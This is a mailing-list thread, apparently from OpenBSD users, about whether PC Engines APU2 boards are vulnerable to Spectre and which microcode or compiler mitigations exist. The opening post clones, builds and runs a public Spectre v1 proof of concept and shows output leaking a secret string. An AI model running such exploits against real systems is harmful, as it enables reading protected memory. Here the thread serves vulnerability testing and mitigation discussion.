Re: APU2 and Spectre
If someone is interested: https://github.com/kolargol/apu2_firmware of course for testing bins, OpenBSD reports IBPB: cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,HTT,SSE3,PCLMUL,MWAIT,SSSE3,CX16,SSE4.1,SSE4.2,MOVBE,POPCNT,AES,XSAVE,AVX,F16C,NXE,MMXX,FFXSR,PAGE1GB,RDTSCP,LONG,LAHF,CMPLEG,SVM,EAPICSP,AMCR8,ABM,SSE4A,MASSE,3DNOWP,OSVW,IBS,SKINIT,TOPEXT,DBKP,PERFTSC,PCTRL3,ITSC,BMI1,IBPB,XSAVEOPT On 21:11 Mon 10 Sep, Zbyszek Żółkiewski wrote: > > > Wiadomość napisana przez Consus < con...@ftml.net > w dniu 25.08.2018, o godz. 17:08: > > > > Seems like APU2 board is vulnerable to Spectre: > > seems there is microcode update with mitigations but looks like none want to > claim where that microcode comes from: > > https://github.com/pcengines/apu2-documentation/issues/75 > > did someone try to load it from obsd? is it possible? >> There is an unofficial binary with unknown origin. Seems like AMD have >> sent microcode updates to some motherboard manufacturers, but there is >> no hard proof though.
Re: APU2 and Spectre
On 21:11 Mon 10 Sep, Zbyszek Żółkiewski wrote: > > > Wiadomość napisana przez Consus w dniu 25.08.2018, o > > godz. 17:08: > > > > Seems like APU2 board is vulnerable to Spectre: > > seems there is microcode update with mitigations but looks like none want to > claim where that microcode comes from: > > https://github.com/pcengines/apu2-documentation/issues/75 > > did someone try to load it from obsd? is it possible? There is an unofficial binary with unknown origin. Seems like AMD have sent microcode updates to some motherboard manufacturers, but there is no hard proof though.
Re: APU2 and Spectre
> Wiadomość napisana przez Consus w dniu 25.08.2018, o godz. > 17:08: > > Seems like APU2 board is vulnerable to Spectre: seems there is microcode update with mitigations but looks like none want to claim where that microcode comes from: https://github.com/pcengines/apu2-documentation/issues/75 did someone try to load it from obsd? is it possible? _ Zbyszek Żółkiewski
Re: APU2 and Spectre
On Sat, Aug 25, 2018 at 06:08:49PM +0300, Consus wrote: > Hi, > > Seems like APU2 board is vulnerable to Spectre: > > $ uname -r > 6.3 > $ dmesg | grep cpu0 | grep AMD > cpu0: AMD GX-412TC SOC, 998.27 MHz > $ git clone https://github.com/crozone/SpectrePoC > $ cd SpectrePoC > $ gmake > $ ./spectre.out 85 > Using a cache hit threshold of 85. > Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED > INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED > Reading 40 bytes: > Reading at malicious_x = 0xffeff180... Success: 0x54=’T’ score=2 > Reading at malicious_x = 0xffeff181... Success: 0x68=’h’ score=2 > Reading at malicious_x = 0xffeff182... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffeff183... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffeff184... Success: 0x4D=’M’ score=2 > Reading at malicious_x = 0xffeff185... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffeff186... Success: 0x67=’g’ score=2 > Reading at malicious_x = 0xffeff187... Success: 0x69=’i’ score=2 > Reading at malicious_x = 0xffeff188... Success: 0x63=’c’ score=2 > Reading at malicious_x = 0xffeff189... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffeff18a... Success: 0x57=’W’ score=2 > Reading at malicious_x = 0xffeff18b... Success: 0x6F=’o’ score=2 > Reading at malicious_x = 0xffeff18c... Success: 0x72=’r’ score=2 > Reading at malicious_x = 0xffeff18d... Success: 0x64=’d’ score=2 > Reading at malicious_x = 0xffeff18e... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffeff18f... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffeff190... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffeff191... Success: 0x72=’r’ score=2 > Reading at malicious_x = 0xffeff192... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffeff193... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffeff194... Success: 0x53=’S’ score=2 > Reading at malicious_x = 0xffeff195... Success: 0x71=’q’ score=2 > Reading at malicious_x = 0xffeff196... Success: 0x75=’u’ score=2 > Reading at malicious_x = 0xffeff197... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffeff198... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffeff199... Success: 0x6D=’m’ score=2 > Reading at malicious_x = 0xffeff19a... Success: 0x69=’i’ score=2 > Reading at malicious_x = 0xffeff19b... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffeff19c... Success: 0x68=’h’ score=2 > Reading at malicious_x = 0xffeff19d... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffeff19e... Success: 0x4F=’O’ score=2 > Reading at malicious_x = 0xffeff19f... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffeff1a0... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffeff1a1... Success: 0x69=’i’ score=2 > Reading at malicious_x = 0xffeff1a2... Success: 0x66=’f’ score=2 > Reading at malicious_x = 0xffeff1a3... Success: 0x72=’r’ score=2 > Reading at malicious_x = 0xffeff1a4... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffeff1a5... Success: 0x67=’g’ score=2 > Reading at malicious_x = 0xffeff1a6... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffeff1a7... Success: 0x2E=’.’ score=2 > > I've double-checked output of syspatch(1) and fw_update(1) but no > pending updates exist. Am I missing something or there is no mitigation > for this AMD CPU family? > That's spectre v1 IIRC. And yes, AMD is susceptible. Someone will need to do the work to move the lfence changes into llvm/clang (maybe that's already done) and you'll need an AMD cpu with the MSR to treat lfence as serializing (that is already committed, but you obviously need that CPU capability). -ml
APU2 and Spectre
Hi, Seems like APU2 board is vulnerable to Spectre: $ uname -r 6.3 $ dmesg | grep cpu0 | grep AMD cpu0: AMD GX-412TC SOC, 998.27 MHz $ git clone https://github.com/crozone/SpectrePoC $ cd SpectrePoC $ gmake $ ./spectre.out 85 Using a cache hit threshold of 85. Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED Reading 40 bytes: Reading at malicious_x = 0xffeff180... Success: 0x54=’T’ score=2 Reading at malicious_x = 0xffeff181... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffeff182... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffeff183... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffeff184... Success: 0x4D=’M’ score=2 Reading at malicious_x = 0xffeff185... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffeff186... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffeff187... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffeff188... Success: 0x63=’c’ score=2 Reading at malicious_x = 0xffeff189... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffeff18a... Success: 0x57=’W’ score=2 Reading at malicious_x = 0xffeff18b... Success: 0x6F=’o’ score=2 Reading at malicious_x = 0xffeff18c... Success: 0x72=’r’ score=2 Reading at malicious_x = 0xffeff18d... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffeff18e... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffeff18f... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffeff190... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffeff191... Success: 0x72=’r’ score=2 Reading at malicious_x = 0xffeff192... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffeff193... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffeff194... Success: 0x53=’S’ score=2 Reading at malicious_x = 0xffeff195... Success: 0x71=’q’ score=2 Reading at malicious_x = 0xffeff196... Success: 0x75=’u’ score=2 Reading at malicious_x = 0xffeff197... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffeff198... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffeff199... Success: 0x6D=’m’ score=2 Reading at malicious_x = 0xffeff19a... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffeff19b... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffeff19c... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffeff19d... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffeff19e... Success: 0x4F=’O’ score=2 Reading at malicious_x = 0xffeff19f... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffeff1a0... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffeff1a1... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffeff1a2... Success: 0x66=’f’ score=2 Reading at malicious_x = 0xffeff1a3... Success: 0x72=’r’ score=2 Reading at malicious_x = 0xffeff1a4... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffeff1a5... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffeff1a6... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffeff1a7... Success: 0x2E=’.’ score=2 I've double-checked output of syspatch(1) and fw_update(1) but no pending updates exist. Am I missing something or there is no mitigation for this AMD CPU family?
